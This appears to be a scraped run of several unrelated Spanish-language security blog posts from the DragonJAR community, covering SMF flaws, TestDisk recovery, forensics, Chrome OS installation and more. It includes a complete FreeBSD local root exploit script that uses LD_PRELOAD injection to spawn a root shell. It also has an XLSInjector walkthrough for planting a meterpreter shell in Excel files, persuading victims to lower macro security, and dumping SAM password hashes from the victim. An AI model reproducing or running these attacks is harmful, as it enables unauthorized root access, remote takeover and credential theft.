En esta ocasión les traigo un vídeo creado por JavaGuru en el que nos enseña de una forma practica, como realizar ingeniería inversa a un juego de ajedrez desarrollado en JAVA y JNLP, el vídeo muestra como eliminar una de las restricciones implementadas en este juego, pero los conceptos pueden ser aplicados en cualquier aplicación desarrollada en JAVA y que utilice JNLP.

También puede interesarte...

• Cursos Gratuitos de Programacion en el SENA VIRTUAL
• Memorias del Black Hat USA 2009
• Cursos Gratis de Diseño Web en el Sena Virtual
• Programar para el iPhone, un negocio rentable
• Programación Segura: Problemas de cadena de formato
• Programación Segura: Desbordamientos del Búfer
• Código fuente para Sistemas de Matriculas, Ventas, Biblioteca, Odontología, Administración de Autos en .NET
• Crear un Protector de Pantalla con Visual Basic 6

Entre los fallos encontrados existen 3 con peligrosidad alta (uno de ellos permite ejecución remota de código), 14 con un nivel de peligro medio (en su mayoría ataques del tipo XSS) y en resto de los fallos tienen un nivel de peligrosidad bajo o nulo.

Desde la comunidad DragonJAR enviamos un saludo a los integrantes del equipo SimpleAudit no solo por los fallos encontrados, sino por la publicación responsable de ellos, esperando que SMF publicara una versión parcheada de su software para hacer el Full Disclosure.

Cada uno de los fallos encontrados en SMF han sido publicados y explicados en el foro de ElHacker.net por WHK, ademas en nuestro idioma.

Mas Información:
Pagina del Proyecto
Anuncio en el Foro
Full Disclosure

También puede interesarte...

• XSS que permite postear a atacante registrado en WordPress
• Parches para Windows que corrigen Vulnerabilidades Criticas
• Criterios para la Evaluación de los Escaners de Seguridad Web
• Bug en el modulo Quick Question de Joomla
• XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2
• Descargar Gratis Internet Explorer 8 Final
• Video Tutorial Fingerprint y Escaneo Básico
• Video Tutorial de Nessus y Baseline Security Analyzer

El error reside en el Run-Time-Link Editor (rtld), que normalmente no permite variables de entorno peligrosas como LD_PRELOAD pero con una técnica sencilla el rtld pueden ser engañado para que acepte variables LD, incluso en los binarios setugid.
VERSIONES DE FREEBSD AFECTADAS
**********************************
FreeBSD 8.0-RELEASE *** VULNERABLE
FreeBSD 7.1-RELEASE *** VULNERABLE
FreeBSD 6.3-RELEASE *** NO VULNERABLE
FreeBSD 4.9-RELEASE *** NO VULNERABLE

Para más detalles ver el exploit.

#!/bin/sh
echo ** FreeBSD local r00t zeroday
echo by Kingcope
echo November 2009
cat > env.c << _EOF
#include

main() {
extern char **environ;
environ = (char**)malloc(8096);

environ[0] = (char*)malloc(1024);
environ[1] = (char*)malloc(1024);
strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");

execl("/sbin/ping", "ping", 0);
}
_EOF
gcc env.c -o env
cat > program.c << _EOF
#include
#include
#include
#include

void _init() {
extern char **environ;
environ=NULL;
system("echo ALEX-ALEX;/bin/sh");
}
_EOF

Para compilar y ejecutar

gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env

Mas Información en el Full Disclosure publicado por Nikolaos Rangos

También puede interesarte...

• Multiples Vulnerabilidades en SMF
• ¿Que Mirar Cuando Auditamos una Base de Datos Oracle?
• XSS que permite postear a atacante registrado en WordPress
• Parches para Windows que corrigen Vulnerabilidades Criticas
• Criterios para la Evaluación de los Escaners de Seguridad Web
• Denegacion de Servicio desde el WordPad
• Reseteo Remoto del Password de Admin en WordPress
• XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2

SUMARIO

• Artículos Destacados.
• Entrevista a Cristian Borghello para La Comunidad DragonJAR
• Debilidad en Protocolos
• Noticias Destacadas.
• Documentación.
• Encuestas.
• Anuncios
• Consultas.
• Próximo Eventos.
• Boletines Anteriores.

ARTÍCULOS DESTACADOS

• Descargar e Instalar Google Chrome OS
• Instalación, Configuración y Uso del Microsoft Cofee
• Recogiendo Evidencias para Análisis Forense en Windows
• Tutorial: Conociendo Metasploit Framework [En Construccion] By:Rcart

ENTREVISTA A CRISTIAN BORGHELLO PARA LA COMUNIDAD DRAGONJAR

Mientras se llevaba a cabo la Gira de Seguridad Antivirus de ESET Latinoamérica, realizada desde el 26 de octubre hasta el 3 de noviembre por las principales ciudades de  Colombia, DragoN tuvo la oportunidad de reunirse en Manizales con Cristian Borghello quien trabaja como Educational & Technical Manager para ESET Latinoamérica además de administrar el portal de seguridad informática SEGU-INFO.com.ar y realizarle una entrevista para nuestra comunidad. Leer la nota completa

DEBILIDAD EN PROTOCOLOS

Las debilidades en  los protocolos y como descubrir estas debilidades es algo que a los administradores de red y las personas interesadas en la seguridad informática nos debe interesar, en este podcast, realizados por Fernando Quintero (nonr00t) para sus alumnos de Administración de Redes del SENA,  explica de forma clara y fácil de comprender que es la debilidad en los protocolos y como encontrar estas debilidades..Ver nota completa

NOTICIAS DESTACADAS

• XLSInjector – Inyectar Shell Meterpreter en Archivos Excel
• ¿Como Eliminar la Contraseña de un PDF?
• ¿Cómo Recuperar una Cuenta de Facebook?
• El reemplazo de Milw0rm Debilidad en Protocolos
• ¿Qué son los Proxies?
• ¿Qué son los Firewalls?
• ¿Qué es la Ingeniería Social?
• ¿Que son los Sniffers?
• ¿Que Mirar Cuando Auditamos una Base de Datos Oracle?
• XSS que permite postear a atacante registrado en WordPress
• Parches para Windows que corrigen Vulnerabilidades Criticas
• Listado de Diccionarios para Realizar Ataques de Fuerza Bruta
• Antivirus para Mac OS X Gratis
• Twitterrific y 5 Aplicaciones mas para Mac Gratis
• Criterios para la Evaluación de los Escaners de Seguridad Web
• Binging – Footprinting utilizando Bing
• ¿Es suficiente la seguridad lógica en entornos de alta seguridad?
• TestDisk, Open Source para recovery de datos
• Cobian backup, gestor de copias de Seguridad de acceso libre
• Nueva era, el DNI electrónico.
• Testking – Visual CertExam
• Spoofing + scam + pharming = Desastre
• Todo sobre ataques DoS
• Argument Injection
• Linux Gratis hasta la puerta de tu casa
• Buscar Exploits
• Cripto Serie: Funciones resúmen criptográficas – SHA-2
• Funciones Hash
• Cifrado César
• Lista de algoritmos de encriptacion
• Hide In the Picture
• Nessus, Nmap y Metasploit
• Sacar password de Red inalambrica con cain y abel
• DHCP con Packet Tracer
• Marketing y Primero en google 2010
• Facebook : Nuevo Gusano XXX mediante ataques CSRF y Clickjacking
• Canal Habla Hispana Backtrack

DOCUMENTACIÓN

• Laboratorios virtuales… (I/X)
• Laboratorios virtuales… (II/X) Cisco CCNA 4.0 Exploration [Español]
• Manual de Buffer Overflows: ejemplo y explicación
• [Tutorial] Reconocimiento de un sistema (Backtrack4)
• Varios videos de hacking
• Introducción a los shellcodes en Linux
• Destripando\Analizando Un Ejecutable By TokioDrift[1º Parte]
• Analizando\Destripando Un Ejecutable En Ejecucion By TokioDrift [2º Parte]
• Seguridad Web Desde 0
• Manual Ataque Flash!
• Administrar/Rootear Servers Win32
• Nociones básicas de Encriptación
• Offensive Security 101 – Videos & PDF
• Coleccion CSS XHTML

ENCUESTAS

• ¿Linux más seguro que windows?
• ¿Cual Navegador Web, consideras es el más seguro y Por qué?

ANUNCIOS

• Posible Nuevo Logo para La Comunidad DragonJar
  
• Los talleres para la quedada de armenia
• Canción DragonJAR

CONSULTAS

• Particiones nfts en backtrack
• Donde consigo correos electronicos??
• Password Dell Inspiron 8200
• Virus en documentos word
• Claves para proteger la información de una PYME
• No entiendo los requerimientos funcionales y no funcionales
• Software que ejecute comandos automaticamente
• Ayuda Dibujar en C
• Compilador para Ubuntu 9.10 ?
• Sistema de Biblioteca
• Consulta Store Procedure
• Consulta de redes
• Necesito ayuda con los mapas de karnoff para simplificar circuitos lógicos

PRÓXIMOS EVENTOS

• Encuentro Comunidad DragonJar en Armenia
• Primer Cafe Joomla! en Bogota – Colombia
• Primer Barcamp Cali!!!!

BOLETINES ANTERIORES

• Boletín de La Comunidad DragonJAR #0004
• Boletín de La Comunidad DragonJAR #0003
• Boletín de La Comunidad DragonJAR #0002
• Boletín de La Comunidad DragonJAR #0001

También puede interesarte...

• Boletín de La Comunidad DragonJAR #0004
• Boletín de La Comunidad DragonJAR #0003
• Boletín de La Comunidad DragonJAR #0002
• Boletín de La Comunidad DragonJAR #0001
• La Comunidad DragonJAR en LemonTV.tv
• Laboratorios Realizados de La Comunidad DragonJAR
• Laboratorios de Seguridad Informática en Bogotá
• Laboratorios de Seguridad Informática

La recuperación de la Tabla de Particiones usando TestDisk es realmente fácil, ademas de esto TestDisk puede:

• Arreglar la Tabla de Particiones, recuperar particiones eliminadas
• Recuperar sectores de booteo FAT32 de su copia de respaldo
• Reconstruir sectores de booteo FAT12/FAT16/FAT32
• Arreglar tablas de booteo de tipo FAT
• Reconstruir sectores de booteo NTFS
• Recuperar sectores de booteo NTFS de su copia de respaldo
• Arreglas la MFT usando la MFT mirror
• Localizar el Superblock de copia de respaldo de ext2/ext3
• Recuperar archivos de sistemas de archivos FAT, NTFS y ext2
• Copiar archivos de particiones FAT, NTFS y ext2/ext3 eliminadas

TestDisk tiene características para expertos y principiantes. Para aquellos que saben poco o nada sobre técnicas de recuperación de datos, TestDisk puede ser usado para recolectar información detallada sobre un disco que no bootea, la cual después puede ser enviada a un técnico para mayor análisis. Aquellos más familiarizados con dichos procedimientos pueden encontrar en TestDisk una herramienta útil para realizar recuperación de datos on-site.
Además es compatible con los siguiente sistemas operativos:

DOS (real o en una ventana de Windows 9x),
Windows (NT4, 2000, XP, 2003, Vista),
Linux,
FreeBSD, NetBSD, OpenBSD,
SunOS y
MacOS

Y puede detectar los siguientes sistemas de ficheros:

BeFS (BeOS)
BSD disklabel (FreeBSD/OpenBSD/NetBSD)
CramFS, Sistema de Archivos Comprimidos
DOS/Windows FAT12, FAT16 y FAT32
Windows exFAT
HFS and HFS+, Sistema de Archivos Jerárquicos
JFS, IBM’s Sistema Diario de Archivos(Journaled File System)
Linux Ext2 y Ext3
Linux Raid

• RAID 1: espejos
• RAID 4: arreglos con dispositivo de paridad rayados
• RAID 5: arregloscon información de paridad distribuida rayados
• RAID 6: arreglos con información de dúo redundancia distribuida rayados

Linux Swap (versiones 1 y 2)
LVM y LVM2, Administración de Volumen Lógico de Linux
Mapa de particiones Mac
NSS Servicio de Almacenamiento Novell
NTFS ( Windows NT/2K/XP/2003/Vista )
ReiserFS 3.5, 3.6 y 4
Sun Solaris i386 disklabel
UFS y UFS2, Sistema de Archivos Unix (Sun/BSD/…)
XFS, SGI’s Sistema Diario de Archivos(Journaled File System)

Bueno una vez que sabemos de que es capaz TestDisk veamos el problema

El problema

Tengo un HD externo el cual tiene 300 GB pero al mirar el administrador de discos…me sale..

Como podéis ver la partición me sale de 232 GB es decir, aquí falta algo no? Algo se nos ha perdido.
Ahora nos descargamos TestDisk
Descargar TestDisk
Nos descargamos la versión que necesitamos según nuestra plataforma.
Iniciamos TestDisk

Aquí tendremos la primera pantalla, en la que podremos crear un log, esto va bien por si queremos comprobar luego el proceso.
Continuamos.

Como veis aquí nos salen las particiones de los discos duros.
Seleccionamos el que necesitamos y nos llevará a la siguiente pantalla.

Ahora TestDisk analizará el disco duro en busca de las particiones. Continuemos

Aquí nos dice que efectivamente hay un error con el disco duro y hay sectores en donde hay problemas
Le damos a Quick search

Ahora nos hace una pregunta, nos pregunta si la partición está por debajo de Windows Vista.
En nuestro caso, si asi que ponemos Y
Ahora veremos el proceso de búsqueda.

Ahora nos irá mostrando las particiones que vaya encontrando.
Cuando acabe el proceso nos mostrará los resultados.

Podemos ver una cosa.. Yo ejecuto testdisk en un ordenador donde tengo instalado MAC OS X
Así que me ha encontrado la partición en HPFS y la otra en NTFS.
Elegimos la partición de NTFS

Ahora nos sale la partición escogida, le damos a Enter y continuamos.

Finalmente le damos a Write! Y ahi escribiremos los cambios en la partición como podéis ver nos sale hasta el nombre que le asignamos a la partición cuando la hicimos

Ahora nos pedirá confirmación para escribir los cambios de la partición.

Si es un disco externo, lo desenchufamos y lo volvemos a enchufar.
En el caso de que sea un disco duro interno lo reiniciamos.
Entonces ya nos aparecerá la partición

Como veis en la imagen ya nos ha aparecido la partición que estábamos buscando

Y si la exploramos para ver el contenido

Articulo escrito para La Comunidad DragonJAR por Seifreed en TestDisk, Open Source para recovery de datos

También puede interesarte...

• ¿Como Eliminar la Contraseña de un PDF?
• Nueva versión de Cain & Abel
• Manual de TrueCrypt
• Instalación, Configuración y Uso del Microsoft Cofee
• Binging – Footprinting utilizando Bing
• IV Freedom & Open Source Day – Lima Perú
• Top 100 Herramientas de Seguridad Open Source
• Katana – Múltiples Distribuciones de Seguridad en tu USB

En esta ocasión les voy a hablar sobre XLSInjector, una herramienta creada en perl por keith lee que permite inyectar en un archivo XLS de Microsoft Excel una consola meterpreter (ejecutando todo en la memoria ram sin crear procesos adicionales), permitiéndonos acceder a el remotamente por el puerto 4444 y tomar total control de la maquina.

Para que XLSInjector funcione adecuadamente, necesitamos lo siguiente:

• Una Maquina (virtual o real) con Windows
• Microsoft Excel
• Perl
• El modulo Win32:OLE para Perl
• Un archivo XML a infectar
• El XLSInjector
• y por ultimo el Metasploit Framework

Después de tener todos los elementos necesarios para el correcto funcionamiento del XLSInjector pasamos a su ejecución, que es bastante simple:

perl xlsinjector.pl -i ArchivoDeExcel.xls -o ArchivoConShellDeExcel.xls

Pero no todo es tan simple con esta herramienta, resulta que XLSInjector NO salta los filtros de scripting puestos por Microsoft en su suite ofimática, por lo que toca convencer, por medio de ingeniería social o cualquier otra técnica que el mismo usuario ponga la seguridad de las macros en baja y que “confié” en los proyectos de VB, algo complicado pero que seguro con algo de presunción se consigue que realicen estas tareas.

Suponiendo que ya se realizaron las configuraciones adecuadas para el correcto funcionamiento del XLSInjector vamos a acceder remotamente a nuestra shell meterpreter mediante la consola del Metasploit Framework

• iniciamos la consola del metasploit
• una vez en la consola de MSF cargamos el payload de meterpreter
  set payload windows/meterpreter/bind_tcp
• lo configuramos adecuadamente
  set RHOST ipdelpcvictima
set RPOT 4444
• luego lo lanzamos
  exploit

Con estos simples pasos tenemos a nuestra disposición una shell meterpreter en el equipo remoto, hay que recordar que las shell meterpreter son diferentes a las del sistema operativo, y tienen su propio listado de comandos, puedes sacar el listado de comandos disponibles para la shell meterpreter escribiendo “?” y enter, te arrojara algo parecido a esto:

Core Commands
=============

Command Description
——- ———–
? Help menu
channel Displays information about active channels
close Closes a channel
exit Terminate the meterpreter session
help Help menu
interact Interacts with a channel
irb Drop into irb scripting mode
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
run Executes a meterpreter script
use Load a one or more meterpreter extensions
write Writes data to a channel

Stdapi: File system Commands
============================

Command Description
——- ———–
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rmdir Remove directory
upload Upload a file or directory

Stdapi: Networking Commands
===========================

Command Description
——- ———–
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table

Stdapi: System Commands
=======================

Command Description
——- ———–
execute Execute a command
getpid Get the current process identifier
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shutdown Shuts down the remote computer
sysinfo Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

Command Description
——- ———–
idletime Returns the number of seconds the remote user has been idle
uictl Control some of the user interface components

Priv: Password database Commands
================================

Command Description
——- ———–
hashdump Dumps the contents of the SAM database

Priv: Timestomp Commands
========================

Command Description
——- ———–
timestomp Manipulate file MACE attributes

Hay que resaltar la potencia de meterpreter para inyectar dll’s, subir ficheros, ejecutar scripts, te recomiendo que le des una leída a estos documentos (Meterpreter.pdf y MSF3-met.html) para que aprendas mas sobre los comandos del meterpreter.

Te recomiendo utilizar el comando migrate tan pronto puedas para evitar que tan pronto cierren el archivo XLS se cierre con el tu shell, otro comando recomendado es hashdump que te arroja el contenido del archivo SAM en la maquina victima para que posteriormente puedas obtener la clave de los usuarios con herramientas como l0phtcrack o cain&abel.

Por ultimo les dejo el video del autor, donde nos enseña el funcionamiento del XLSInjector

También puede interesarte...

• Multiples Vulnerabilidades en SMF
• Parches para Windows que corrigen Vulnerabilidades Criticas
• zsh: Una shell interactiva más amigable para el usuario
• Firmando Documentos y Correos con GPG
• Cursos Gratis de Informática en el Sena Virtual
• Nueva version de SAPYTO (0.98)
• MultiInjector – Herramienta Automática de Inyección SQL
• Vulnerabilidades Web que Permiten Acceder al Sistema

Indice

1. Introducción
2. Obteniendo datos volátiles
3. Obteniendo datos no volátiles
4. Clonando el disco
5. Referencias

1.- Introducción

Tradicionalmente los forenses vienen dividiendo los datos en 2 tipos:

• Datos volátiles.
• Datos no volátiles.

Los datos volátiles son aquellos que al apagar la maquina a analizar se pierden. Esto no es del todo exacto, pues tal y como debatimos aqui es posible recuperar datos almacenados en RAM _tras apagar_ el equipo.

Los datos no volatiles por el contrario son aquellos que permanecen en el disco duro tras apagar la maquina.

Tipicamente, un forense adquiriria una imagen del disco mediante herramientas tipo dd o cualquiera de sus evoluciones (podemos ver mas del Análisis de memoria RAM. Recogida de evidencias en este post). Nunca con herramientas tipo Ghost, pues perderiamos la información a mas bajo nivel como en que clusters o sectores estaba almacenada la informacion, espacio particionado y libre (unallocated), espacio slack o espacio sin particionar.

Y como una imagen vale mas que mil palabras, como dice el refran, a continuacion muestro una imagen donde se ve mas claro lo que son estos conceptos:

Sobre el espacio slack me gustaría hacer un inciso, enlazando un vídeo algo viejo pero interesante titulado Look for deleted data on the slack space of a disk.

También comentar la existencia de la genial utilidad slacker, sobre la que hablamos, quizas muy por encima para lo que se merece, en un hilo llamado Anti-Forensics.

Así que los que queráis iniciaros en el uso de dicha herramienta, podéis consultar un paper bautizado con el atrayente titulo de catch me, if you can… presentado en la Blackhat 2005 por James Foster y el crack Vinnie Liu, que no se si a dia de hoy sigue implicado en el Proyecto Metasploit.

Y por ultimo, para los que querais profundizar sobre sistemas de archivos a bajo nivel, os recomiendo el _excelente_ libro File System Forensic Analysis, de Brian Carrier; ademas de los talleres de Vic_Thor sobre FATxx y NTFS.

“Cualquier contacto, deja un trazo”
Locard’s Exchange Principle

Continuar el post en Recogiendo datos para Análisis Forense de sistemas Windows >>

También puede interesarte...

• Análisis forense de memoria RAM en entornos Windows
• Webcast de Microsoft sobre Seguridad Informática
• Instalación, Configuración y Uso del Microsoft Cofee
• Parches para Windows que corrigen Vulnerabilidades Criticas
• Como quemar un archivo DMG en Windows y GNU Linux
• Process Hacker, Mata Procesos en Windows
• Nueva versión de Cain & Abel
• Procedimientos De Obtención De Evidencia En Windows

Básicamente existen dos  formas de eliminar las contraseñas de los archivos PDF, la primera es utilizando la fuerza bruta, es decir, probando muchas contraseñas, mediante un diccionario o generando estas sistemáticamente hasta dar con el password, la otra forma es utilizando un software especializado, que elimine la contraseña de los archivos PDF, de esta forma, simplemente se eliminan las restricciones del archivo PDF, permitiendo disfrutar de él plenamente y hacer con el lo que queramos.

Una de las herramientas para eliminar contraseñas de PDF’s mas conocidas es PDF Password Remover que con dos simples pasos puede eliminar la contraseña de cualquier pdf  y con una interface bastante simple.

Este software no es gratuito, pero la empresa AnyBizSoft ha decido por esta temporada de navidad, regalar licencias de su producto PDF Password Remover hasta el mes de Febrero de 2010, así que apresúrate a conseguir tu copia de este excelente software para eliminar las claves de los PDF, solo necesitas seguir los siguientes pasos:

1. Ingresar a esta dirección y llenar tus datos.
2. A tu casilla llegará un numero serial asociado a tu cuenta de correo.
3. Luego simplemente abres el PDF Password y das click en “Register” y pones los datos que llegaron a tu correo.

Aprovecha esta oportunidad y disfruta plenamente de tus archivos PDF.

También puede interesarte...

• Nueva versión de Cain & Abel
• TestDisk – Recupera tus Particiones y Archivos
• Manual de TrueCrypt
• Nuevo Gusano Infecta Routers, Modems, y Sistemas GNU Linux
• “1234″ y “password” son las Contraseñas + Utilizadas en USA
• Las Peores 500 Contraseñas de Todos los Tiempos
• Cómo recuperar una clave en MD5
• Ophcrack con soporte para Windows Vista

Ahora que conoces cuan valiosa es para un delincuente informático tu cuenta de facebook y cuanto mal puede causarte a ti y a tus contactos, es importante que cuides de ella, utilizando claves fuertes, utilizando siempre la conexión segura de facebook, navegando desde computadores de confianza y no abriendo archivos adjuntos que no estas esperando.

Si lamentablemente has llegado tarde a los simples consejos para evitar que roben tu cuenta, y ya has sido victima de algún delincuente informático, no te eches a llorar que no todo esta perdido, facebook es conciente de este tipo de robos y ha puesto a tu disposición una serie de herramientas para que puedas recuperar tu cuenta, en caso de que esta fuese robada.

Existen 2 formas de recuperar tu contraseña de Facebook, la primera y mas sencilla de todas es utilizando el servicio “¿Has olvidado tu contraseña?“, haciendo clic en el. Recibirás un mensaje de correo electrónico con los pasos que tienes que seguir para recuperar tu clave de facebook.

Si tu cuenta ha sido robada y tu correo electrónico también, no te preocupes aun puedes llenar este formulario diseñado especialmente para estos casos, envíar la información que te piden sobre tu cuenta, para que los encargados en facebook puedan  investigar tu caso y devolverte el acceso a tu cuenta de facebook.

Como vez, es sencillo recuperar tu clave o cuenta de facebook, solo recuerda tener mas cuidado la próxima vez para que no te vuelva a suceder.

También puede interesarte...

• Infección Virus a través de Redes Sociales
• Usando Google para descifrar Password MD5
• Listado de Diccionarios para Realizar Ataques de Fuerza Bruta
• Configuracion segura de GMail
• Crackear redes inalambricas con WPA en 1 Minuto
• Cuidado con los correos en tu iPhone o iPod Touch
• Cambiar Password de Switch CISCO
• Firmando Documentos y Correos con GPG

Ahora que tenemos claro de que se trata Google Chrome OS vamos a instalarlo en nuestro PC, actualmente hay 2 versiones del Google Chrome OS liberadas, una creada por un Jon Ursenbach de GDGT y otra creada por Mark Renouf la versión que utilizaremos para este articulo es la creada por Renouf.

¿Qué Necesitamos para Instalar Google Chrome OS?

• Un software para crear Maquinas Virtuales puede ser VirtualBox o VMWare, el articulo lo hice con VMWare en Windows 7 pero es indiferente el sistema operativo usado (las 2 soluciones están para casi todos los Sistemas Operativos) y los pasos no varían mucho de VMWare a VirtualBox.
• Una copia del Google Chrome OS liberada por Mark Renouf, puedes descargarla por torrent utilizando un cliente como uTorrent.

Instalando Google Chrome OS

Suponiendo que tienes ya instalado el VMWare o el VirtualBox y descargado el Google Chrome OS desde los enlaces proporcionados, pasaremos a la sencilla instalación de este nuevo sistema operativo.

Abrimos el VMWare (tu puedes escoger VirtualBox si lo prefieres) y le damos a “New Virtual Machine”.

Nos saldrá un asistente en el que debemos seleccionar una configuración “Typical”.

En el siguiente paso del asistente le decimos que no deseamos instalar el sistema operativo (ya que en el disco duro virtual que nos bajamos ya esta instalado el google chrome os).

Seleccionamos un sistema linux y continuamos

Seguimos en el asistente y escogemos el nombre que tendra nuestra maquina virtual, yo he elegido “Google Chrome OS” pero puedes ponerle el que quieras.

En el siguiente paso debemos crear un disco duro virtual, no importa de cuantas GB lo crees ya que este disco lo eliminaremos mas tarde, para utilizar el que descargamos por torrent y que contiene el nuevo google chrome os.

Con esto ya tenemos nuestra maquina virtual creada

Ahora vamos a configurarla para que nuestro Chrome OS funcione adecuadamente, primero editaremos la memoria ram que tendrá el sistema operativo, yo tengo 2gb en mi PC físico así que le doy 600mb a mi maquina virtual, tu puedes escoger la cantidad a tu gusto o dejarla como viene por defecto.

Ahora vamos a eliminar el disco duro que creamos con el asistente, para después agregar el que descargamos por torrent.

Despues de eliminado el disco, damos click al boton “Add..” para agregar el que descargamos

Seleccionamos “Hard Disk” y damos a “Next >”

Seleccionamos la opción “Use an existing virtual disk”…

Buscamos donde tenemos la imagen descargada (descomprimir antes) y la seleccionamos.

Damos en “finish” y luego en “OK”.

Ahora debemos estar en la pantalla inicial de nuestra maquina inicial, solo tendremos iniciar la maquina y listo.

A los pocos segundos de iniciar nuestra maquina virtual (es bastante rápido el inicio) tendremos el siguiente pantallazo:

Donde debemos ingresar una cuenta de google validad (nuestra cuenta gmail sirve) y la contraseña de la misma

Esperamos un poco mientras se conecta a los servidores de google

Y nos encontramos frente a nuestro nuevo sistema operativo, que como se decía en el vídeo del inicio, no es mas que un navegador web donde podremos hacer lo que necesitemos en la red.

Ademas de encontrarnos con un “panel” donde podremos acceder a los servicios online mas populares

En el siguiente vídeo podremos aprender un poco el funcionamiento de este nuevo sistema operativo.

En lo poco que he usado el Google Chrome OS puedo decir que no representa a corto plazo una amenaza para los sistemas operativos que actualmente dominan el mercado (Microsoft Windows, Mac OS X y GNU Linux), aunque si podria ser utilizado ampliamente en las netbooks ya que ese es su principal objetivo. Veo un sistema operativo muy diferente al resto y que limita en gran medida a el usuario, no creo que tenga mucha acogida a corto plazo en el pc de escritorio o los laptops, aunque todo esto puede cambiar a medida que la gente migre masivamente a las aplicaciones online.

¿ya probaste google chrome os?…. que opinión tienes de el… háznoslo saber en los comentarios.

También puede interesarte...

• Forzando Conexiones SSL por defecto
• Descargar Gratis Internet Explorer 8 Final
• Muy Bonito, Muy de la Casa, MUY INSEGURO
• Nueva Vulnerabilidad en Google Chrome
• Primera Vulnerabilidad en Google Chrome
• Multiples Vulnerabilidades en SMF
• Criterios para la Evaluación de los Escaners de Seguridad Web
• Binging – Footprinting utilizando Bing